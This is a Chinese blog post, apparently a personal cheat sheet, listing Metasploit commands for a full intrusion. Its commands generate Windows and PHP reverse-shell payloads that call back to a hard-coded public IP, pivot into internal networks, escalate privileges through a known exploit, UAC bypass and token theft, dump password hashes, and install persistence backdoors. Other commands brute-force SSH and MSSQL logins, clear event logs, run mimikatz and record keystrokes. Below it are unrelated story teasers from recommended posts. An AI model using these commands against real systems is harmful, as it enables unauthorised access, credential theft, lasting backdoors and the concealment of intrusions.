[2019-10-0x01] MSF的一些常規(guī)操作

MSF的一些常規(guī)操作

一、 Payload 的幾種常用生成

1.1 生成windows下的反彈木馬

msfvenom -p windows/meterpreter/reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f exe > 8888.exe
# -p <payload> -f <format> -o <path> = >

1.2 監(jiān)聽

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
# 阿里云云服務(wù)器這里是內(nèi)網(wǎng)ip
set LHOST 172.17.150.246
set LPORT 8888
exploit -j

1.3 php

msfvenom -p php/meterpreter_reverse_tcp LHOST=60.205.212.140 LPORT=8888 -f raw > shell.php
use exploit/multi/handler
set PAYLOAD php/meterpreter_reverse_tcp
set LHOST 172.17.150.246
set LPORT 8888
exploit -j

1.4 shellcode

# -e 使用編碼 -i 編碼次數(shù)
msfvenom -p windows/meterpreter/reverse_tcp LPORT=1234 LHOST=60.205.212.140 -e x86/shikata_ga_nai -i 11 -f py > 1.py

二巾遭、內(nèi)網(wǎng)代理

2.1 首先需要鏈接 sessions ,在此基礎(chǔ)上添加路由

meterpreter > run get_local_subnets //獲取網(wǎng)段
meterpreter > run autoroute -s 172.2.175.0/24 //添加路由
meterpreter > run autoroute -p //查看路由
meterpreter > run autoroute -d -s 172.2.175.0 //刪除網(wǎng)段
meterpreter > run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24 //探測該網(wǎng)段下的存活主機(jī)鞠评。
meterpreter > background //后臺sessions

三夏块、提權(quán)

3.1 getsystem

meterpreter > getsystem //直getsystem提權(quán)北专,最常用簡單的辦法

3.2 使用 exp 提權(quán)

meterpreter > background //先后臺運行會話
[*] Backgrounding session 1…
msf > use post/windows/escalate/ms10_073_kbdlayout
msf > show options
msf > set session 1 //設(shè)置要使用的會話
msf post(ms10_073_kbdlayout) > exploit
注意:如果創(chuàng)建了一個system進(jìn)程,就可以立馬sessions 1進(jìn)入會話闭专,然后ps查看進(jìn)程奴潘,使用migrate pid注入到進(jìn)程旧烧。
或者直接:
meterpreter > run post/windows/escalate/ms10_073_kbdlayout

3.3 盜取令牌

meterpreter > use incognito //進(jìn)入這個模塊
meterpreter > list_tokens –u //查看存在的令牌
meterpreter > impersonate_token NT AUTXXXX\SYSTEM //令牌是DelegationTokens一列,getuid查看画髓,兩個斜杠

[注]:只有具有"模仿安全令牌權(quán)限"的賬戶才能去模仿別人的令牌掘剪,一般大多數(shù)的服務(wù)型賬戶(IIS、MSSQL等)有這個權(quán)限奈虾,大多數(shù)用戶級的賬戶沒有這個權(quán)限夺谁。一般從web拿到的webshell都是IIS服務(wù)器權(quán)限,是具有這個模仿權(quán)限的肉微,建好的賬戶沒有這個權(quán)限匾鸥。使用菜刀(IIS服務(wù)器權(quán)限)反彈meterpreter是服務(wù)型權(quán)限。

3.4 Bypassuac

msf > use exploit/windows/local/bypassuac //32位與64位一樣碉纳,其他幾個模塊也一樣
msf > show options
msf > set session 4
msf > run //成功后會返回一個新的session勿负,進(jìn)入新會話,發(fā)現(xiàn)權(quán)限沒變劳曹,使用getsystem即可完成提權(quán)

3.5 Hash

meterpreter > run post/windows/gather/smart_hashdump //讀取hash這種做法最智能奴愉,效果最好。

四铁孵、建立持久后門

4.1 服務(wù)啟動后門

meterpreter > run metsvc -A //再開起一個終端锭硼,進(jìn)入msfconsole
msf > use exploit/multi/handler //新終端中監(jiān)聽
msf > set payload windows/metsvc_bind_tcp
msf > set LPORT 31337
msf > set RHOST 192.168.0.128
msf > run //獲取到的會話是system權(quán)限

4.2 啟動項后門

meterpreter > run persistence -X -i 10 -p 6666 -r 192.168.71.105

# -X 系統(tǒng)開機(jī)自啟,-i 10 10秒重連一次蜕劝,-p 監(jiān)聽端口檀头,-r 監(jiān)聽機(jī)。直接監(jiān)聽就好了岖沛,他自己會鏈接回來暑始。
[注意]:移除 persistence 后門的辦法是刪除 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ 中的注冊表鍵和 C:\WINDOWS\TEMP\ 中的 VBScript 文件。
[缺點]:容易被殺毒軟件殺 烫止。

這兩個后門有個弊端蒋荚,在進(jìn)程中都會存在服務(wù)名稱為meterpreter的進(jìn)程。

五馆蠕、漏洞掃描

5.1 對端口掃描

use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
exploit

5.2 mssql開發(fā)利用

# 1.對各個ip是否有mssql服務(wù)的探測
use scanner/mssql/mssql_ping //測試MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit
# 2.對掃描到的ip進(jìn)行爆破
use scanner/mssql/mssql_login //具體配置show options。
# 3.sa權(quán)限對其利用
use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set CMD cmd.exe /c echo hello
exploit

5.3 mysql開放利用

5.4 爆破ssh模塊

use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file /root/pass.txt //加載字典惊奇,可以收集密碼做字典
set threads 50
run

5.5 通過 nmap 掃描基本漏洞

msf > nmap –script=vuln 受害靶機(jī)ip地址
msf > nmap –script=mysql-info 192.168.0.4 //掃描mysql數(shù)據(jù)庫信息 版本 等..

六互躬、清除記錄

msf > clearev //刪除目標(biāo)機(jī)上的應(yīng)用程序、系統(tǒng)和安全日志颂郎。

七吼渡、一些常用命令

# 查看系統(tǒng)命令
sysinfo

# 截圖
screenshot

# 查看是否是虛擬機(jī)
run checkvm

# 查看運行木馬的用戶
getuid

# 注入到進(jìn)程 成功會提示successfully
migrate pid

# 加載mimikatz模塊
meterpreter > load mimikatz
## 需要system權(quán)限
meterpreter > wdigest 

# 獲取鍵盤記錄
meterpreter> run post/windows/capture/keylog_recorder
#運行鍵盤記錄模塊,他自己創(chuàng)建本文乓序。
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末寺酪,一起剝皮案震驚了整個濱河市坎背,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌寄雀,老刑警劉巖得滤,帶你破解...
    沈念sama閱讀 216,544評論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異盒犹,居然都是意外死亡懂更,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,430評論 3 392
  • 文/潘曉璐 我一進(jìn)店門急膀,熙熙樓的掌柜王于貴愁眉苦臉地迎上來沮协,“玉大人,你說我怎么就攤上這事卓嫂】对荩” “怎么了?”我有些...
    開封第一講書人閱讀 162,764評論 0 353
  • 文/不壞的土叔 我叫張陵晨雳,是天一觀的道長呜呐。 經(jīng)常有香客問我,道長悍募,這世上最難降的妖魔是什么蘑辑? 我笑而不...
    開封第一講書人閱讀 58,193評論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮坠宴,結(jié)果婚禮上洋魂,老公的妹妹穿的比我還像新娘。我一直安慰自己喜鼓,他們只是感情好副砍,可當(dāng)我...
    茶點故事閱讀 67,216評論 6 388
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著庄岖,像睡著了一般豁翎。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上隅忿,一...
    開封第一講書人閱讀 51,182評論 1 299
  • 那天心剥,我揣著相機(jī)與錄音,去河邊找鬼背桐。 笑死优烧,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的链峭。 我是一名探鬼主播畦娄,決...
    沈念sama閱讀 40,063評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了熙卡?” 一聲冷哼從身側(cè)響起杖刷,我...
    開封第一講書人閱讀 38,917評論 0 274
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎驳癌,沒想到半個月后滑燃,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,329評論 1 310
  • 正文 獨居荒郊野嶺守林人離奇死亡喂柒,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,543評論 2 332
  • 正文 我和宋清朗相戀三年不瓶,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片灾杰。...
    茶點故事閱讀 39,722評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡蚊丐,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出艳吠,到底是詐尸還是另有隱情麦备,我是刑警寧澤,帶...
    沈念sama閱讀 35,425評論 5 343
  • 正文 年R本政府宣布昭娩,位于F島的核電站凛篙,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏栏渺。R本人自食惡果不足惜呛梆,卻給世界環(huán)境...
    茶點故事閱讀 41,019評論 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望磕诊。 院中可真熱鬧填物,春花似錦、人聲如沸霎终。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,671評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽莱褒。三九已至击困,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間广凸,已是汗流浹背阅茶。 一陣腳步聲響...
    開封第一講書人閱讀 32,825評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點兒被人妖公主榨干…… 1. 我叫王不留炮障,地道東北人目派。 一個月前我還...
    沈念sama閱讀 47,729評論 2 368
  • 正文 我出身青樓,卻偏偏與公主長得像胁赢,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,614評論 2 353

推薦閱讀更多精彩內(nèi)容

  • Metasploit基本介紹與配置 Metasploit作為一個非常全面的滲透工具智末,用來收集信息非常好用谅摄,信息收集...
    yingtaomj閱讀 2,746評論 0 2
  • 一、MSF終端命令 show exploits 列出metasploit框架中所有的滲透攻擊模塊 show pay...
    Kaen閱讀 3,250評論 0 1
  • 0x00 前言 繼上篇文章《制作CHM文件后門》系馆,成功制作了一份具有欺騙性的CHM幫助文件送漠,并通過郵件發(fā)送給了女神...
    快要沒時間了閱讀 5,175評論 1 2
  • 一 漏洞及漏洞發(fā)掘方法 漏洞,是指在硬件由蘑、軟件闽寡、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,210評論 0 30
  • 今天 在喜馬拉雅上 測試聲音 我的聲音 像孫儷 你的聲音 像米老鼠 我的域偏低 你的音域偏高 什么時候 我們一起朗...
    南風(fēng)魚兒閱讀 331評論 0 2